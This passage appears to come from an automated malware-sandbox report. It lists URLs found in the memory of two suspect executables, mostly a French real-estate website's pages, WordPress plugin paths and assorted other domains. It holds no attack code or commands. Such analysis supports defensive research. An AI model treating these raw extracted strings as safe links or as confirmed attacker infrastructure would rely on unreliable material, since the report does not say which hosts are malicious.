                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/M
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/_
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/%
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/Y
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/x
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsag.infod
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/O
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/R
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/2
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/Y
                      Source: iJzpyjAehB.exe, 00000000.00000002.601285094.0000000005CAD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, pigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/d
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/9
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
                      Source: iJzpyjAehB.exe, 00000000.00000002.600942575.0000000004D4D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, pigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/
                      Source: pigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/E
                      Source: pigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/i
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/172-appartement-a-vendre-lille-30534
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/174-appartement-a-vendre-grenoble-30514
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.3
